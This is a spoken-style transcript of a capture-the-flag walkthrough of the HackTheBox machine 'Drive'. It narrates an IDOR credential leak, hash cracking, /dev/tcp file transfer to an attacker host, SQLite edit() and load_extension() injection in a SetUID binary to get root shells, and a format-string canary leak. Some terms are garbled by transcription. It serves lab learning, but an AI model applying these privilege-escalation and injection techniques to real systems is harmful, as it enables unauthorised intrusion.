What's going on YouTube? This is IPSec. I'm doing Drive from HackTheBox, which starts out with a file upload site. It has an IDOR vulnerability, so you can look at any file that has been uploaded, and one of those files has credentials to log into the box. Once you're logged in, you discover there are some backups, but they are password protected. There is also a Gitea instance listening on localhost, which is just like a GitHub or GitLab type of website. Logging in there, you can look at an older version of the website that has the password used for the backups. So you can decrypt them and then crack the old passwords, and then you get access to a different user. This user can access the DoodleGrive Binary, which has two vulnerabilities in it. The first one is a SQL injection that you can use to get root, which is really fun to do. The second one is a traditional buffer overflow, and we're going to be showing you three ways. There's two different ways we can exploit this through SQL, and then the third way is going to be through binary exploitation. So with that being said, let's just jump in. As always, I'm going to start off with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it drive, and then the IP address of 10.10.11.235. This can take some time to run, so I've already ran it. Looking at the results, we have 3 ports open. Actually, it looks like 2 ports open because one is filtered. But the first one is SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP on port 80, and its banner tells us it's Nginx, also running on Ubuntu, and is directing us to drive.htb. So let's go ahead and add this to our host file so we have that DNS entry. So 10.10.11.235, drive.htb, save it. And then the final thing is port 3000, and that is filtered. It's probably not going to be PPP, which I think is point-to-point protocol. It's probably some type of web server. And the default languages that like 3000, to my knowledge, are like Node.js with Express, Golang likes 3000. I think Ruby on Rails likes 3000 as well. A lot of Python stuff defaults to port 8000, but doesn't really help us speculating. It's just ideas what could be running on the back end, right? So let's go take a look at the web server. So 10.10.11.235. And this will probably redirect us over to drive.htb as nmap showed us. And we see welcome to DoodleGrive. So the very first thing I like doing is trying to fingerprint the server. So I'm going to turn nmap on and inspect the headers just to see if there's like an X powered by header. Go over here, send it over to repeater. Looking at this, we have X frame, but that is not powered by. Nothing really is leaking too much. There is one thing I noticed that kind of leaks what it is. It's not guaranteed. It's just an educated guess. And if you can see it, kudos to you. If not, if you're curious, it's this CSRF token, right? The Django likes defaulting to this. If it was CSRF underscore token, let me send this over to, okay. If it was CSRF underscore token, it would probably be Flask, I think. If it's something like underscore CSRF, I think this is Node.js's or Express's default one. If it's like X CSRF token, I think a lot of Rails apps and Laravel uses this, or maybe it's XSRF. What is the default Laravel one? Default Laravel CSRF token. I know it's an X dash something. I don't know if it's X dash CSRF or XSRF. I have Burp Suite intercepting. Let's turn that off. Let's see. It's probably not going to be that easy to find. Cookie name? There we go. X-XSRF token is default for Laravel. So these type of things just help you fingerprint the application. If you understand what framework it uses, you know what type of attacks to use against it, right? You should use all of them all the time, but if it was Ruby on Rails, I always start with mass assignment vulnerabilities because I think it's scaffolding they use internal terminology to it, just makes it likely vulnerable. There's probably newer things in Rails where mass assignment isn't as big of a deal, but that's one vulnerability I see in a lot of Rails apps. So let's see. I'm going to assume this is Django. And let's just try logging in to see if we have anything. If we do admin, enter correct username and password. We can try the registry here to create an account. I'm going to do ipsec root at ipsec.rocks. And the password's going to be password. And let's intercept this so we can kind of see what the request is. So we have the CSRF middleware token. That is probably Django. Google.com. The first result, Django. So this is definitely going to be a Django app. So let's see, anything else interesting? Not really. Let's just forward it along. And password is too common. So let's do password with an @ and a 0, 1. I don't think I put an exclamation point. Oh, man, I probably did. There we go. And let's log in. And we can upload file or go to a dashboard. If I go to the dashboard, it just is /home. It says, welcome to DoodleGrive. And if I do view, we can see information, right? So let's send this over into repeater. Intercept on. I don't have it here. So what I'm seeing right now is we have a file ID, and then we have get file detail, right? The very first thing I do is, this is probably going over to a database as the ID. Let's just try a SQL injection. And we get an internal server error. This field ID expected a number, but got this. So this is probably going to be Pydantic. It's going to be, I'm going to get the name wrong. Exactly what it does. It's like a static typing thing. So if the field is coded to be integer and we pass it a string, and that's based upon just having string characters in it, it's going to fail. So I'm not going to bother with SQL injection at all because we can only pass numbers in this field. So the very first thing I want to do is probably look for some type of Ghidra vulnerability, right? Let's send this over to FFUF and send 1 through 2000 and see what we get back, right? And before I do that, I'm going to get rid of the CSRF token to see if I need it. It looks like maybe I do. It says hello IPsec. So if I leave this in, get file ID 100. Okay, so we don't need that. It just simplifies the FFUF command if we don't have as many cookies. I'm guessing we definitely need session ID because that's going to say we're logged in. If I got rid of all the cookies, it redirects us to login. So let us do a FFUF. So I can do FFUF-u http drive.htb, and we're going to fuzz the ID. I'm going to give it the get file detail field. And we're going to do -w. I'm going to do this little thing. If you don't know what this does, it's going to run a command, but put the output to a file. So if I did like echo sec010, it creates this temporary file. And if you viewed this file when this command was running, it would be the output of this command. So it comes really handy to make this word list because we don't have to go find a word list that has 0 to 2000 on it. We just specify it this way. Okay. Then we want to give the header, and it's going to be cookie dash. We want to grab this. Okay. And I think that could be good. Okay, it is. So we have a bunch of status 500s. What if we gave it 100? I'm going to do sequence 99 to 100. That's going to be a 200. And oddly enough, we got 401. So let's just filter out all, what do we say, 500s? And we probably want to go to 2000. I'm going to do -FC for filter code 500. So that's going to hide it. If we look at the matcher, these are all the things we're matching against without this, and 500 is here. With that filtered, we are now filtering that out. And we can see all the IDs that have something. We have 79, 98, 100, 99, and 101 so far. Let's see. V IDs.text 79, 98, 199, 101. Okay. So those are going to be the valid IDs. What happens if we create our own? Let's go to Files, Upload. I think I'm still intercepting. We can upload a test file and see exactly what this looks like. Intercept on, upload. So we just post a /upload and give it the contents. The file name, readme.license, get home, and we have the test file here. We can look, we have a few more options when we have our test file. When welcome to DoodleGrive, we have just view. If we go over to a test file, we have change properties, which is update. We have delete, edit content, and view. And I guess we could have looked at exactly what 79 or 98 is. The reason why I didn't is because it's a 401 error code. Anything 400s is going to be some type of error. This is probably going to be like unauthorized, right? I mean, you could do HTTP status 401, and that is unauthorized, right? So let's look at all the functions. If we go here, we can do update. So if I tried 79/update, is that what it was? Change properties, 112/update. We have a trailing slash. If I get rid of that, we just get it unauthorized. So it looks like the functions, we don't want a trailing slash. The other thing I want to see is case sensitive. If I do a capital I, it's not found. So this is a case sensitive thing. We can go to edit content. Let's go back here. Unauthorized. Let's see. What happens if we change property? So I'm going to now intercept, apply. And let's see how we specify it. So we make a post to update. Let's try posting to 79. Unauthorized. Okay. So let's see. Is there anything else? There is this reserve, and that goes over to /block. If we go to 79/block, it looks like we can view it. And this one happens to have a credential. We have this credential right here. And it says, I've created the user Martin on the server. So let's try logging in, SSH Martin at 10.10.11.235. Paste in the password, and we get logged in. Now, there is one thing I want to go over, because if we didn't find the /block thing that way, another good way to do it is just through fuzzing, right? Let's actually exit this S8 session to go back to a FFUF. So we're going to fuzz, what is our ID of the one we uploaded? 112. And then I'm going to put the fuzz here. And then we're going to change the word list to opt sec list discovery web content API. There it is, API. And we can try things in this one. I like objects.txt. And you can also do raf small words. You can use a lot of word list. But if we do this, hopefully we'll get a response back. And we probably are not getting a response back now because I forgot the trailing slash exists there, right? We just want fuzz. So there we go. We can delete. Let's see what else there is. Just delete right now. I'm hoping block shows up. It's near the end and it did not. Is block not on this word list? Let's grep block on this. Only blocks. So that's why that did not show up. Unblock. So I guess it's not in any of these API word list. So maybe you're best off using Raft small words. Let's use that one. Web content, Raft small words dot text. And that will take a while because we have 43,000 things to go. And there we go. We have a block. Oddly enough, block redirects us. Because block has a trailing slash, but update didn't. Weird. And no file matches 112/update. I wonder if we Oh, I know what happened. That is awful. So this is always the danger when you send like automated tests against a web application. I know I've been burned by this before, sending like Acunetics or NetSparker at a application, and then it goes and hits some dangerous functionality. What is the first API endpoint we hit on our fuzz? I'll give you a hint. It was delete. So the very first thing we hit when we fuzzed all the functions was a delete, and then that's why nothing else came back. We deleted our post, and then everything subsequently just didn't respond. So whenever you do fuzzing, always be careful of that. I'm going to do 100 for that reason, because delete isn't a thing to us in 100. So if I went to, let's try the objects again. And I'm going to change it to 100. Do we hit more things? There's delete. There's update. So we are hitting more things. Block is not on that word list, but yeah, that is something to take note. And one of the benefits of doing CTFs and exploring things like going beyond root like this, because you do learn those tips. I now know always be careful when fuzzing an API endpoint where you could potentially delete something. It's just something to test first. So before I run fuzz, I may want to look to see if delete is possible, right? So let's get back to this. It was what, 79, then block, I want to say. 79, block. There we go. Let's view it. Copy this password again so we can SSH. Hopefully you enjoyed that small tidbit or rant there. Did not expect that to happen, but I'm always glad when things fail in a CTF because it's a good learning opportunity, right? So as Martin, let's see what we have. Just a snap directory. The first thing I want to do is go over the web application. So that's probably going to be in DoodleGrive. Was it DoodleGrive the whole time? It was. I think I've been saying drive, but it's Grive. Okay, we can't go in that directory. If we look at it, only www data can. There is a backups directory we can go in. So we could grab all the backups. So if we go into, let's just drop our SSH key here real quick. Let's go cd home, make dir.sh. Then we'll sh keygen-f drive, cat drive.pub, the authorized keys. There we go. This will just make it easier for me to SSH copy things, right? We'll do Martin. There's var www backups. We need to specify -r for recursive. Martin at 10.10.11.235. There we go. It's copying each of these backups. So let's go in and we can do 7zx to extract these. I don't know why it wasn't tab auto completing there. We need a password. If we just do SQLite 3 db.sqlite3.dump, we have a lot of data. Definitely Django. We see Django right there. Is there like it It looks like, oh, that's accounts underscore. Select star from accounts. G users. Oh man. Dot dump. Let's look for password. There we go. Account custom user, maybe. Let's see. This one, hi team. New backup schedule plan. The database will be automatically highly compressed and copied to here. Small batch scripts that runs at midnight. Backup directory may change. Strong password. Don't try to crack it. Nothing interesting. So the password was under, what was it? Accounts custom user. So we can do select star from this. And there we go. We have a few hashes. Let's see, is there password? I'm guessing username. There we go. So we have some creds here. I'm going to go over to the Kraken. And this is just a box I have on my network, so I can crack things not on my main computer because it is a CPU intensive process and a lot of things can like slow down when you start cracking things. So I like doing it just on a separate computer, right? So what I'm going to do is replace all the pipes with a colon because that puts it in a hashcat format. I'm going to do hashcat -- user. This way, when we crack things, it ignores the username. And I just like keeping the username there because when we crack it, I don't have to go like compare hashes. This just makes it so much easier. It tells me, oh, this password went to this user. So let's do hashes drive opt word list rocku.txt. Does it have a auto detect mode for this? It looks like it does. It is cracking in mode 124 Django SHA-1. So while that goes, let's keep poking at this server. So back in SSH land, what do we have? If we go to home, there are a few users. If I do find.-type f, I can only see files in Martin. I see LXD. If I look at my groups, I am not a member of the LXD group. If I was, that is a quick privesc. The thing I am curious about is what was on port 3000, right? Because we do have that listening probably, since IP tables was blocking us. So I'm going to forward that to my host. And if you don't know how I just did that, if the very first thing you type on a SSH session is this squiggly C, then it drop you in this command line mode where you can just enter the SSH flags. I think if you do -H, it gives you the helps to do port forwards. So definitely helps. I now have localhost bound to my host. And it looks like there is Gitea. And this is a Golang version of, let's say, GitHub. So let's try signing in, username or email address. Well, we know Martin. His password will be over here. So if I do Martin, the password, it does not work. But if we went over to what we are cracking, we did get one. If we do --show, we can see we got Tom Hands. His password is John316. But if I look at the hashes and go to drive, Martin is Martin Cruz here. So you can also try this one. Oh, whoops. Martin Cruz. And I got to copy his password again. And we can log in. I would also try logging into as Tom Hands, but that does not work. I will save us the 5 minutes it would take to test. We have this repo. Oddly enough, it goes to 404. So whenever I specify localhost, it isn't going, I don't know what's happening. But you have to specify 127.0.0.1. That is bizarre. I'm guessing what's happening is localhost on my box could be going to IPv6, and I'm not forwarding IPv6. Yeah, that is probably what is happening. Let's test this out real quick because I am curious. I'm going to turn Burp Suite off. Let's go to localhost 3000, 404. So let's sudo v etc host, and I will comment out that one. So localhost is 127.0.0.1. That is not it. Or maybe DNS is cached or something weird. I'm not sure what's going on there. That is odd. But anyways, if we just specify 127.0.0.1, we do have a application. So let's try to download this. And where does it let us download? Right here. Download repo. Download as zip. And it's probably, oh, that looks better. HTTP, drive, save. Let's see if it downloads or downloaded the 404 page. File, doodle, looks like it's a zip. So we'll make a directory source, 7zx, doodle, go in here, and I'm just going to open this up in Visual Studio Code to explore it. It's going to take a second to open up, hopefully. Where are you? There we go. And let's see, we have manage.py. It's definitely going to be Django. I'm going to go over to Sneak to make sure the code security test runs. It looks like it is downloading some updates. If we go over here, let's see exactly how does this work. So if we go over to admin, custom user, apps, it looks like my Visual Studio is hung. I'm going to give this some time just to fully load up because my VM looks like it's struggling. This thing stopped updating. So it may just need a few seconds because I think updates are being installed to Visual Studio and just hung things. Okay, it looks like my computer has calmed down. We still have the code scanning going on. One thing we could also do, since it was a Git repo, is do like a Git log. I wonder, oh, because I downloaded as I did, I don't have the Git history. So let's go over here to the commits. And we can see what else there is. We have changed the password hashes to SHA-1, changed the password hashes to decrypt, returning the default Django hashes. This is where they added the database backup. So if we look at it, they have a shell script to do database backup. They're using 7zip-ap, and it says hack this password if you can. So it looks like that could be the password. We may not even have to do any code analysis. So let's go back to where we have the backups. 7zx, star.7z, 7zx. I guess it did not like how I did that. 7z. Oh, is every file going to be db.sqlite3? Or is it this? I think it outputted here. So let's do SQLite3, DoodleGrive, DB, select, was it password from account custom? Was that what it was called? Let's just do .dump. Strong password. Account custom user. Accounts custom. Is it underscore like this? There we go. That's a different format. Okay, let's do to users. Okay. Let's get the next file. So 1 November. What is that password? Yep, overwrite it. Still have new hashes. SQLite 3. 7ZX. 1 October. Paste. Overwrite. Copy it over to users. And the final one. Overwrite. There we go. So if I cat users, we have quite a few. It looks like the password was not changing between them, but we have some more. So let's go ahead and grab all of these. Go back over to hashcat. I'm going to do hashes drive 2. Put these, and then we want to replace all the pipes with colons, just like we did the last time. And now we can crack this. So let's do hashes drive 2 opt wordless rocku.text, and we'll see if it detects the correct mode. We have it in 10,000, which is Django PBK DF2 SHA-256. So it looks like we are cracking. And let's see. I don't know how long this is actually going to take. If we look at it, it says up to 2 hours. I'm going to let this go for a few seconds to see if anything does pop. And there we go. We have one password, and that is John Mayer 7. And that is this hash. It doesn't tell us the user it goes to. We could open a new window or quit this out and do show to see exactly the user, or we could have just grepped it, right? But I'm just going to look at the user. It looks like Tom Hands, his password is going to be John Mayer 7. So let's try this password on the box. So we go back here and we can do su-Tom Hands. Oh, it's probably just Tom. Let's cat Etsy past WD. It is just Tom. We see it right here. So we can do su-Tom, put in this password, and we get logged in as him. If we look at the README here, it looks like there is a binary of DoodleGrive. If we try to execute it, we want a username. We can try ipsec and a password, and it says invalid username and password. So at this point, I want to copy this binary over to my box so we can see if it has any hard-coded credentials. What is it doing here? Is it trying to access a database when it does username password? Is it accessing a file? I don't know. So let's stand up a netcat listener. We'll call this DoodleGrive. Is it CLI or something? -CLI. Oh well. And we can cat this over to our box. So dev TCP 10.10.14.8 9001. Looks like it's sent. Let's just MD5 sum both files to make sure they are the same thing. And it looks like they match. So let's go open up Ghidra and see exactly what this binary is about. So let's do file, new project. Doesn't matter what we put here because I'm not saving any of my analysis. Open up the little dragon, and then we will import the binary once this loads. There we go. It's disassembling. Let's analyze it. Okay. And I guess we never even did a file against it to see exactly how it is. Because if it was like Golang or something like that, it would tell us here. We could also run strings against it to see if anything sticks out of what could be like a password. But the easiest thing to do is just look at Ghidra. And it looks like my VM has slowly frozen. We see it hung right there. It's probably just loading this binary. So I'm going to pause the video, give it a couple seconds for this to finish loading, and then we will look at what Ghidra says about this. Okay, so now Ghidra is loaded. I'm going to go over to the exports, and let's see, is there an entry? How about main? If we go here, it looks like there is a main. So we can see the code here. Here's its loading. It's doing the SetUID and GID. Then it does enter username and then enter password. And it's comparing the username here. So if we look at enter username, it's assigning it to local 58. We can say username. And if we look at password, there it is. So we can say password here. And after we relabel those, I was just clicking and hitting L if you don't know how to use that. It calls Sanitize String on the password, and then it's going to compare the username against Moriarty, and then it's going to look for this password. So we have credentials to this. So if we went back here, we can now execute this, enter the username, and then enter the password. It looks like Sherlock Holmes themed. And then we have options, right? We can show user list. We can show the group list, check the server health, look at the request log, activate accounts. I bet if we read the README, we'd understand exactly the purpose of it all. So if we log in, it says welcome, and then calls main menu. So going to main menu, we can look at what each of these things do. So we go to show user list, it's going to execute SQLite 3, and then just do this command, right? So if we do groups list, it is going to again call system with SQLite 3, doing all the commands. So it looks like all of these are SQLite. I guess server log, this will probably cat a file. So it's using sudo -u www data. So this is telling us that www data can have a sudo rule. Do we have any access to the web server, right? If we go var www, DoodleGrive, no. If we did HTML, can we drop files in HTML? Let's see. Touch T, permission denied. Who can write in here? Only root. So let's see. Yeah, only root can write there. So we don't have any way to drop a file. And what I was thinking is if we could drop a file on the web server, maybe as the PHP module enabled, drop a PHP shell, and then gain code execution that way, right? But it doesn't look like we have any ability to do that. So let's keep looking. We do want to look at the sudo rules for that, though, because keep that in mind, because if we could ever find a way to get to this user, that may be a priv-esc, right? So let's go back, look at activate user account, and this is doing something similar, right? We have the SQLite 3, but it's also prompting us for username. So this is going to be, let's see, it's loading the username. Where is it? 148 here. This is probably it. It does fgets, yeah. So username activate. So let's look at the sanitize string, because right away, this looks like we could just do straight command injection, right? Because we got a system command here. We're inputting data at this %s. So if we just put a double quote, a semicolon, we should be able to execute commands, right? It does call sanitize string though. And this is a weird way of Ghidra decompile showing us a loop, but essentially this is looping through this variable. And each of these hex is a character. So we can see like backslashes, the curly brace. What other thing is bad? Pipe, new line character, null byte. All those are bad characters. And we also got this one, which is a semicolon. And it's just treating this, I want to say, as a double word, which is 8 characters. But if we look at the loop here, it is actually going through 9, right? So we end this, we go through this variable, and then this one. So all of these are the bad characters. So since the pipe, the semicolon was like $bad, dollar is not bad. I wonder if that will work. Let's see. That may work. Will parentheses bad? No, let's try that. So let's go back to our home directory, execute this, enter the username. We have to grab the password. Where is it? Here it is. Now we want to activate account. I did exit. And then what we wanted to do is make sure we get a single quote in. We're still in Sanitize String, activate user account. We want to get a single quote in, so we get out of this username. And then let's try a command. So if we do, let's do sleep 5 to see if we sleep for 5 seconds. We did not. And it said unrecognized token, this dollar. So it doesn't look like we can use that because it's going to be part of the SQLite command. Because it's in single quotes, and a single quote was a bad character. So that's why we can't escape that. So where we're left with is we have to find some way to exploit this. And since we're just doing the SQLite 3 binary, we can probably use some type of SQL injection in this. The binary also is vulnerable to a buffer overflow, but I find the SQL injection route the more interesting one, so that's the one I'm going to be showing. So if we look at SQLite's help, so SQLite 3, maybe if we just do help and man, let's see, command line shell. This will talk about the command line client for SQLite, and you can see all the things it supports. And there is one really interesting thing that will help us escape out of the SQL query, and that is the edit function. So we could just read this, but it would be easier to just show it first. So if we do SQLite, SQLite 3, doesn't matter what file name, it's going to automatically create it if it doesn't exist. If I just do a select 1, we get 1. But if I use this edit function, when we do select edit 1, it's going to say no editor for edit. So then we're going to specify user bin vim like this. And let's do it in single quotes because I already used double quotes for this command. Okay. I'm going to say this is not 1. This is please subscribe. We're going to save and exit. And now my select command says what we put there. So this command is a way to open up an editor to write something. I don't know an exact purpose of it. Maybe if you're editing a line and want to use Vim to do like search and replace or something, or like an update command. Not exactly sure. I've never used this function before, but it exists and we can trigger it, right? And there's going to be one thing that will help us bypass bad characters, and that is the visual environment variable. So if we went back to this, we have no editor. But if we did visual is equal to user bin vim, then it now executes it, right? Because if it doesn't get the second parameter, it defaults to an environment variable. And environment variables are very useful in SetUID binaries, at least exploiting them, because unlike sudo, your environment normally doesn't get reset. So you can pass environment variables into whatever program is being executed. So let's go to activate account, and we will say a double quote. Let's see, let's go back to what the command looks like. So we're here, where username is equal to that. I wonder if I can just do edit right away. Let's try edit 1. Will this work? I doubt it. Near syntax error, so that doesn't do it. So we just want to make this a valid query. I wonder if we can do and edit 1. No editor. That is what we wanted to see. right? So if we did a 5 double quote and edit 1 user bin vim like this, we see it's stripping out all the slashes. And I think that's all like the sanitize string function, right? Let's look at exactly what sanitize string is filtering out again. So let's see. Filtering backslash, slash, squirrely, pipe, new line. Not sure if it's doing everything. Let's see. I'm going to try v test. Let's make a bin bash. And let's call it bash. I'm going to see if I can exploit this quickly without using the environment variable. Where's the password? Grab this. Moriarty, put in the password. 5. So we do that. And edit test. Oh, hold on. 5, edit 1, test. Like that. And that does not seem to have worked. Maybe it's just not executing in this current working directory. I don't know where this is executing. But let's try setting the visual variable now. So if I do visual is equal to user bin vim, put in the password or the username. Now we put in the password. Let's go activate user account. We'll do a single quote and edit 1. And we get dropped to Vim. So now I can just do a colon to enter command mode, then exclamation point, bin bash, and we're root because we use the edit function after we SetUID'd executed Vim, and that lets us go here. I don't know if I explained that well. So the SetUID binary changes to root, and then as we are root, we executed the SQL 3 binary. And because we are root when we're executing that, when we did the edit function, it executed Vim, and that executed as root, and Vim we can just escape with the command, right? So now I can just do cat root dot text. We don't have a path set, right? What if I do bash? Let's see. Is it bin cat root user bin cat? Where is cat installed? I think that's it. Root.text. Hold on 1 second. Echo path. Let's just fix our path and then do this. Okay. Moriarty. Oh man, I'm gonna have to type that password again. Copy. Paste. Activate user. Edit 1. Bin bash. Export path is equal to that. I'm guessing it failed because I can't read. Well, I was thinking I was in my home directory, but again, because of the weird environment variables and everything, it thought my home directory is home Tom, despite me being root, because I'm guessing like, is there like a echo home? Yeah, the home was not reset. So because the environment variables weren't reset, that's why I couldn't get root.text when it looks like I am in root's home because, yeah. If I exported a home to b/root, now my terminal prompt says that. So anyways, let's look at another way we could have done this SQL injection. So I'm going to get out of this and we will run this again. Let's go for the password and grab this. Oh, wait, before I grab the password, we have to create a file. So I'm going to make T, or we'll make lowercase a. And that's going to be bin bash. And then this will just execute bash. And let's make this executable. We made it A. And what we're going to do here is very similar to what we did before with SQLite. So if we do SQLite 3, test.db, select 1, like this, we can see that 1. There's also a load extension. So if we look here, this even calls out potentially harmful side effects such as edit. We found that one. I don't know what this tokenizer is, but we have load extension. And this is going to attempt to load an extension. Since it's executable, it'll just execute code. So I'm going to make this, whoops, there we go, bin bash. Okay, I have A here. I thought I do. There we go. So I have A in my directory. And we'll do a load extension. And we'll call A. It attempted to load a.so. So maybe we have to actually make this a script. I wonder if we move A to a.so and try this again. No such file or directory. That does exist, right? Yeah. Do we have to specify the full path? Home ipsec hdb drive a.so. File too short. So maybe it wants us to actually make a program. So let's create sys.c, and we can do an init. Let's make sure we are setting the UID and GID. I don't think we have to do this since the program does it, but might as well. And then let's do system. Where's bash? Which bash? User bin bash, like that. Okay. And then we need to compile it. So we're going to do gcc shared sys.c. We'll call this a.so. And we want no start files. In function, we do have a.so. So let's try this now. Undefined symbol. So I think instead of init, we need this. Recompile. And there we go. I bet if I exit here, there we go. We have the select one. If we wanted to make it more obvious, we may want to like print something instead of doing this bash, because we just executed this, right? When I exit, that's when the select statement comes. So let's do Python 3, HTTP server, wget 10.10, 14.8, 8000, -o, a.so, a.so. Okay. So now let's go back to Doodle CLI. And we'll want to copy this password. Paste this in. Then we'll activate account. And we're going to close out of the SQL. Then we'll do a comma. We'll do load extension. And then we want to specify A, like that. And that's a bad character. The single quotes were bad. I wonder if we can do double like this. And then let's end it with a comment. Syntax error near that. Let's see, what was the query? We're in Sanitize String right now. So we'll update accounts where is active one, where username is this. Okay, so this is a where username, right? And what we did, whoops, was do a comma. We probably want a and here, or we can use this and as well, because a comma is invalid right there. So let us change this. Activate account. We'll do that and load extension A. Should not have capitalized the A. No such file or directory. Okay, so we have to specify the current directory. And since slashes are bad characters, that's going to make it somewhat tough, right? We had the problem here where we can't do it, but if I did a // then it loads. So slash is a bad character. However, we can do encoding, right? So in SQLite, I think we do char and then 42, maybe lowercase. SQLite encode char. Is it char? There we go. So that's what it is. Man ASCII. Let's go to where the star is. We did 42. So we're encoding it as, where is it? Decimal. So we want a period. So period is going to be, where is that? Right here, 46. So we're going to want char 46. We see that. Now we want a slash. That is going to be 47. And then we want A, which is 97. So that we'll put /A. So this is a way we can get around the bad characters. So let's load this extension again. And then we will select the char. Like that. And that did not work. Let's see, what did we do? We did load extension, char. I guess we should test this out. We need a select. That does drop us in bash. So where did we screw up? Maybe I copied that single quote and we don't want to. Let's just try it again. Activate user. We terminate, comment like that. A.so, not found. Char 46, 47, 97. We must have a bad character somewhere or something. Let's see. Where did I paste that? Load extension. I don't think I have any bad characters. Comma is not one. Dash is not one. Unless space is. If that's a space. Let's get rid of that real quick. 5 is #1. No. Still did not work. Let's try 5, and we'll put the load extension also in parentheses. Like that. Copy this payload. A.so does exist, right? File A.so. What? That is not what I wanted. Well, that explains our error. That looks better. So I don't know exactly what I screwed up there. My wget failed me. I'm guessing we had it working a while ago. It just wasn't loading the file because it didn't have bad code in it. Try this. 5. Let's load extension. We don't want that. Single quote. Like that. There we go. That was it. So that is the second SQL injection we could do. So we could either do it through the edit or the load extension. You may be able to do it through other parameters here. I don't know exactly what the harmful side effect of FTS3 tokenizer is. We could probably write the SSH key as root. So that's something else we could do. As long as the SSH directory exists, right? It doesn't look like .ssh exists. So we wouldn't be able to write the SSH key unless WriteFile can create a directory, which I doubt it can. We can easily test that out. Let's see. Select. Right. What is it? File. T. How do we use WriteFile? One. Cat T. So we wrote 1. So if I do does not exist, ls, we don't have that directory. So it did not create does not exist. If I make the directory, oh wait, // oh, it does create the directory. I probably just created that on my slash, or I did not because I don't have permission. So I'm likely we could write an SSH key. Let's try that real quick. I have not done this one. Okay. So let's see. We'll likely want to, okay. We will have to encode that slash. Or, yeah, we will. So let's say, and WriteFile. Let's see, select char. What is slash? Was that 47? It is. Can we append that way? That did not work. Is there a concat function? SQLite join strings. Let's try this. We do 2 pipes. That's right. Pipe is a bad character. Okay, let's just encode everything. So we want dot, which was 46. Then 47. Then we want SSH. So where is S? 115. Then 115. And I'm just realizing this is probably going to become a massive, massive pain because our SSH key is going to have bad characters, I think. And I don't feel like encoding everything, although we could probably just go to CyberChef and encode it, right? 104. Select char like that. Okay. Oh, we have to do authorize keys. I guess it's time we go to CyberChef, which we should have done much earlier because we can just easily get this done. I'm going to do dot so I can see what it is. I think we're in decimal format, right? 2 decimal, 46, and slash was 47, right? That is correct. So authorized keys, and let's look for replace. Oh, we can do delimiter, comma. There we go. Okay, so SSH. This needs to be a 47. There we go. So let's see if we can make this on the server. So we WriteFile that ugly thing, and we'll do 1 real quick. And we'll close this out. So 1, 2, 3, and a comment. Okay. So I think we can write. Let's see. Let's go to our other one. I think I lost it. Shoot. Yeah, that sucks. I was hoping I could just get my root shell back really quickly so we could look at that file. Because I think we're going to run into potentially the buffer overflow if this is where it exists. I haven't actually done it. Maybe we'll do it at the end of this video. Let's see. SSH keygen small pub key. What is that format? I'm going to generate ED2559. That's it. SSH keygen -f root -t that. So this is a much smaller key than anything else. And of course, we have slashes. If we do this enough, I wonder if it's possible we get one without slashes. We'll try it twice more. Oh, there we go. Oh no, we have 1 slash. A slash at the end. That's got a plus, but no slash. So this may be a better key to do. Okay, so we want to do we lost the whole command. That's annoying. It was WriteFile, right? And WriteFile. We want to write to this. Then the contents of that is going to be this. I guess I should copy this. And we should put a comment at the end. I don't think that worked. Because it like looped over this a few times. And now we exited. So I think we're hitting the buffer overflow or something. If we look at this, if we do a select statement again, where is it? We can test to see if it would work. So select like that. Unexpected token. I think because I have quoteception going on. Select 1, 2, 3. There we go. We got SSH, and we got authorized keys. So it does write. We don't have the period, though. Let's see. Did we forget the period on an encode? We did not. Oh, we did. We have ./SSH. So we want ./.SSH, like that. So 46. And then 2 parentheses. This should be the payload. So I'm going to try this one real quick, because we were having errors in our SQL command. Paste this. And write file. Oh, we already have it. Like that. And then we could try sh-i root at 1010, or let's just do drive.htb because I forgot the IP. And it doesn't work. So I think we're definitely hitting the overflow just because of how many times this menu option shows up, right? We can do visual user bin. Was it in Vim? Is that what Vim is? Which Vim? Yeah. Moriarty. And then what was it? And what was the thing? Edit. One like that. We need to do Okay. Do we have cat? Bin cat, SSH. Yeah, SSH doesn't even exist. So we never wrote the file. And we weren't writing the file because we did /. Shoot. Where are we? Tom? BWD. Oh, this is actually where we are too. So DoodleGrive does exist. We're trying to create the SSH directory here, honestly, by mistake, because I was just doing /.ssh, and this is where the directory was. So we never would have actually wrote to root. We'd have to do /root/.ssh, but either way, it did not create the file. Bin ls on /root. And that does exist, but that's not our key. At least I don't think it is. Yeah. So we don't have enough length to actually write this key, unfortunately. So I guess let's look into the buffer overflow. And it's been a while since I did anything binary exploitation on this channel, so hopefully I can still explain this. The first step is let's run checksec against the binary so we know what built-in protections are at play here. And we see ASLR is not enabled, so any gadget we find in this binary, we can just immediately reuse. We see dep is enabled. We also see stack canaries are enabled as well. So let's go take a look at the binary. I'm going to go over to the main function, and we can take a look at these things. So the first two places we have user input is username and password, and we're using fgets. So we can see when we're loading the username, we're only loading 16 bytes, which is the size of our buffer. So that is fine. However, when we load password, we're loading 400 bytes here, and we've only allocated 56. So this is where the buffer overflow comes into play. However, there are stack protections here. So if we attempted to overflow the stack, this will block us in theory, right? How the stack canary works is it puts something in between where the stack is and all the registers, and that just does checks. Because if you overflow the stack to get into the registers, you're going to overflow the canary, and this check's going to fail. We can see this being allocated right at the top of the program. So pretty much the first thing it does is builds this canary. So we'll look into that in just a minute, but let's validate our buffer overflow. So I'm going to run DoodleGrive. I'm going to enter the username ipsec, and this is going to be one piece of the vulnerability, it echoing this data back, but we'll get into that in a second. Let's just throw a bunch of A's at it. We probably only need like 60 since 56 was the limit. We see stack smashing detected, it terminated. So that's preventing us. However, because it's echoing this back and we're just doing a printf, we can leak memory addresses. So let's show this real quick. It's just a format string vulnerability, right? If we enter the username LX, we're going to leak the very first memory address. If we do LX, we're going to leak 2. The second one is 0. If we do %2 $LX, this is going to be long hex to leak a long field, right? So we have enter password for 0. So if we wanted to, we could say, let's go to 8, long X. There's our first potential memory address. Now that's not the canary because canaries are null byte terminated. So we just want to run this program a bunch of times and find a potential canary. So let's do this first. Let's call a program leakcanary.py, and then we're going to do from pwn import star, and then we're going to load the DoodleGrive CLI program. And then for I in range, let's go through 100 things. This is going to be the first 100 variables. We're going to say IO is equal to E process. So we're loading the program. We want to execute it. We have 2 lines that it reads. So we'll say io.receive line, io.receive line. So now we're at the user prompt. So we can say io.receive send line. And then we want to send, let's see, the percent, and then I, then $LX. And then we want to receive the line. So I'm just going to do a print io.receive line. And then we can say io close. And if we run this, we have a bunch of data. I'm going to disable logging, but we can see we are leaking stuff. So let us say the level is equal to error. So we got rid of, I believe this is debug, this is info. So we got rid of those two things. So now when we run it, we just have what we 